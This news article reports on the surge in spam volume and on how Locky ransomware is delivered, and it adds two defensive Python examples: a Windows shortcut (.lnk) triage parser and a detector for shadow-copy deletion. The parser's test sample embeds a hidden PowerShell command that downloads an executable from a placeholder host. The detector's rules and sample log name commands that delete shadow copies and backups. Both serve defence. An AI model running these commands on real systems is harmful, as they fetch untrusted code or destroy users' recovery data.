Surge in Malicious Spam Email Volume

Spam email volume had declined sharply over the past few years following the takedown of key botnets, and of individuals, behind some of the largest spamming operations. It was beginning to look as though the super-spamming days of the early 2010s were over. In recent months, however, spam volume has been rising again.

Necurs botnet activity has grown, and last month the Tofsee botnet was resurrected. Both botnets had previously been used to send annoying but relatively harmless spam offering cheap pharmaceuticals and Russian brides. This time, however, the growth in volume has come with a shift to malicious attachments that deliver malware, including ransomware.

These and other botnets, such as Kelihos, are also growing at an alarming rate, and overall spam volume is soaring. Some reports indicate that spam volume has risen from around 200,000 messages per second to 450,000 per second over the past few months.

Locky ransomware was first seen in February 2016 and has since become one of the most significant email-borne threats. It is distributed in massive spam campaigns that use increasingly sophisticated social engineering to get end users to open the attachment.

To put these campaigns in perspective: historically, spam used to deliver malware, ransomware and other malicious payloads made up around 2% of overall spam volume. By around April this year, two months after Locky first appeared, malicious spam, including messages carrying the ransomware, accounted for around 18% of total spam volume.

The Quarterly Threat Report published by Proofpoint earlier this month suggests the volume of spam carrying malicious attachments or links reached record levels in Q3 2016, and that most of those messages carried Locky. According to the report, 97% of captured spam messages with malicious attachments were delivering Locky, a 28% increase over Q2 and a 64% increase since Q1.

Since its release, Locky has been delivered through Word documents containing malicious macros, JavaScript (.js) files, HTML Application (.hta) files and, more recently, Windows Script Files (.wsf) carrying the Nemucod downloader. Now another evolution has been detected. Earlier this month, researchers at the Microsoft Malware Protection Center observed that the actors behind Locky had changed their infection method again, switching to Windows shortcut (.lnk) files containing PowerShell commands.
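A minimal triage routine for that last vector, added here as an example and not code from the article, from Microsoft or from any Locky sample: it parses the fixed ShellLinkHeader and the StringData section of a .lnk file (offsets and flag bits as documented in the MS-SHLLINK format, assumed correct here) to pull out the target path and command-line arguments, then flags shortcuts that launch PowerShell with download or policy-bypass switches. The two shortcuts it examines are constructed inside the block by a small builder so the whole thing runs offline; the command line in the "malicious" one is an illustrative placeholder, not one recovered from a real campaign, and the token list is a hypothetical starting point.

```python
import struct

# Constants from the MS-SHLLINK specification (assumed correct here).
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7
SW_SHOWMINNOACTIVE = 7  # window starts minimised, a common trait of malicious shortcuts

# StringData blocks appear in this fixed order when their flag is set.
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

# Hypothetical escalation tokens for a phishing triage queue; tune per environment.
SUSPICIOUS_TOKENS = ("powershell", "-enc", "bypass", "hidden", "downloadfile",
                     "downloadstring", "invoke-expression", "mshta", "wscript", "cmd.exe")


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields plus ShowCommand of a shell link.

    Validates the header, then skips LinkTargetIDList and LinkInfo if present,
    because the strings that matter for triage sit after them.
    """
    if (len(data) < LNK_HEADER_SIZE
            or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]  # IDListSize excludes itself
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]      # LinkInfoSize includes itself
    fields = {"show_command": show_command}
    for flag, name in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]     # CountCharacters, not bytes
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return fields


def triage_lnk(data: bytes) -> tuple:
    """Parse a shortcut and return (fields, list of reasons it looks malicious)."""
    fields = parse_lnk(data)
    text = " ".join(v for v in fields.values() if isinstance(v, str)).lower()
    hits = [tok for tok in SUSPICIOUS_TOKENS if tok in text]
    if fields["show_command"] == SW_SHOWMINNOACTIVE:
        hits.append("window-minimised")
    return fields, hits


def build_lnk(show_command: int = 1, **strings) -> bytes:
    """Build a minimal .lnk (header + StringData only) as constructed test input."""
    flags, body = IS_UNICODE, b""
    for flag, name in STRING_FIELDS:
        value = strings.get(name, "")
        if value:
            flags |= flag
            body += struct.pack("<H", len(value)) + value.encode("utf-16-le")
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0x80, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    return header + body


# Constructed samples; the PowerShell command line is a placeholder, not a real dropper.
MALICIOUS_LNK = build_lnk(
    show_command=SW_SHOWMINNOACTIVE,
    relative_path=r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    arguments=r"-w hidden -nop -ep bypass -c "
              r"(New-Object Net.WebClient).DownloadFile('http://example.invalid/a.exe',$env:TEMP+'\a.exe')",
    icon_location=r"%SystemRoot%\System32\shell32.dll",
)
BENIGN_LNK = build_lnk(
    relative_path=r"..\..\Program Files\Notepad++\notepad++.exe",
    working_dir=r"C:\Program Files\Notepad++",
)

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_LNK), ("benign", BENIGN_LNK)):
        fields, hits = triage_lnk(blob)
        print(label, fields.get("relative_path"), hits)
```

Real attacker shortcuts usually also carry a LinkTargetIDList pointing at the interpreter, which this parser skips rather than decodes; the arguments string is where the payload logic lives, so for triage that is the field to read, and a shortcut whose icon claims to be a document while its target is powershell.exe is the classic tell.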

This discovery coincided with a drop in detections and a relatively quiet two weeks. However, Locky is back with a bang. On Monday this week, three new campaigns were discovered, one of which was massive: around 14 million messages in roughly half a day, 6 million of them sent in a single hour.

The threat posed by Locky is considerable. Locky deletes Volume Shadow Copies, removing the built-in local means of restoring earlier file versions, and encrypts a wide variety of data, including files on portable storage devices and mapped network drives. Recovering from an attack can prove extremely expensive.
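The shadow-copy deletion is the behaviour a detection engineer would key on, because it happens before or alongside encryption and is rarely run by an end user. The rule set below is an added example, not from the article: it scans a few constructed process-creation events (Sysmon-style JSON with assumed field names ProcessId, Image, CommandLine and ParentImage) for the vssadmin command Locky is documented to run, and, going beyond the article, for the equivalent wmic, bcdedit and wbadmin commands that other ransomware families use for the same purpose. Severity is raised when the parent process lives outside the Windows and Program Files directories, which separates a ransomware binary dropped in a user profile from an administrator's scripted maintenance.

```python
import json
import re

# Command lines that destroy local recovery options. The vssadmin one is the
# command Locky is documented to run; the others are the same behaviour seen
# in other ransomware families.
SHADOW_DELETION_RULES = [
    ("vssadmin-delete-shadows",
     re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\b.*\bshadows\b", re.I)),
    ("wmic-shadowcopy-delete",
     re.compile(r"\bwmic(\.exe)?\b.*\bshadowcopy\b.*\bdelete\b", re.I)),
    ("bcdedit-disable-recovery",
     re.compile(r"\bbcdedit(\.exe)?\b.*(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I)),
    ("wbadmin-delete-catalog",
     re.compile(r"\bwbadmin(\.exe)?\b.*\bdelete\b.*\bcatalog\b", re.I)),
]

# Parent processes under these prefixes are treated as plausible admin tooling.
TRUSTED_PARENT_DIRS = (
    "c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
    "c:\\program files\\", "c:\\program files (x86)\\",
)


def classify(event: dict):
    """Return an alert dict if the event matches a rule, else None."""
    cmd = event.get("CommandLine", "")
    for name, pattern in SHADOW_DELETION_RULES:
        if pattern.search(cmd):
            parent = event.get("ParentImage", "")
            trusted = parent.lower().startswith(TRUSTED_PARENT_DIRS)
            return {
                "rule": name,
                "severity": "medium" if trusted else "high",
                "pid": event.get("ProcessId"),
                "parent": parent,
                "command": cmd,
            }
    return None


def scan(lines) -> list:
    """Run classify() over JSON-lines process-creation events; skip blank lines."""
    alerts = []
    for line in lines:
        line = line.strip()
        if line:
            hit = classify(json.loads(line))
            if hit:
                alerts.append(hit)
    return alerts


# Constructed sample log: an admin listing shadows, a ransomware-like deletion
# from a binary in a user's Temp folder, a scripted wmic cleanup, and noise.
SAMPLE_LOG = r"""
{"ProcessId": 4120, "Image": "C:\\Windows\\System32\\vssadmin.exe", "CommandLine": "vssadmin list shadows", "ParentImage": "C:\\Windows\\System32\\cmd.exe"}
{"ProcessId": 5288, "Image": "C:\\Windows\\System32\\vssadmin.exe", "CommandLine": "vssadmin.exe Delete Shadows /All /Quiet", "ParentImage": "C:\\Users\\jsmith\\AppData\\Local\\Temp\\wjdtsz.exe"}
{"ProcessId": 6004, "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe", "CommandLine": "wmic shadowcopy delete", "ParentImage": "C:\\Windows\\System32\\cmd.exe"}
{"ProcessId": 6130, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe Get-Process", "ParentImage": "C:\\Windows\\explorer.exe"}
"""

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG.splitlines()):
        print(f"[{alert['severity']}] {alert['rule']} pid={alert['pid']} parent={alert['parent']}")
```

The parent-path heuristic is deliberately crude; in production it would be joined with the process's signer, the user context and whether the same parent went on to open many files in quick succession, but even the bare command-line match fires early enough in a Locky infection to be worth paging on.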

Posted by

Elizabeth Hernandez

Elizabeth Hernandez is a news writer on Defensorum. Elizabeth is an experienced journalist who has worked on many publications for several years. Elizabeth writes about compliance and the related areas of IT security breaches, with a focus on data privacy and the secure handling of personal information. Elizabeth has a postgraduate degree in journalism. Elizabeth Hernandez is the editor of HIPAAZone.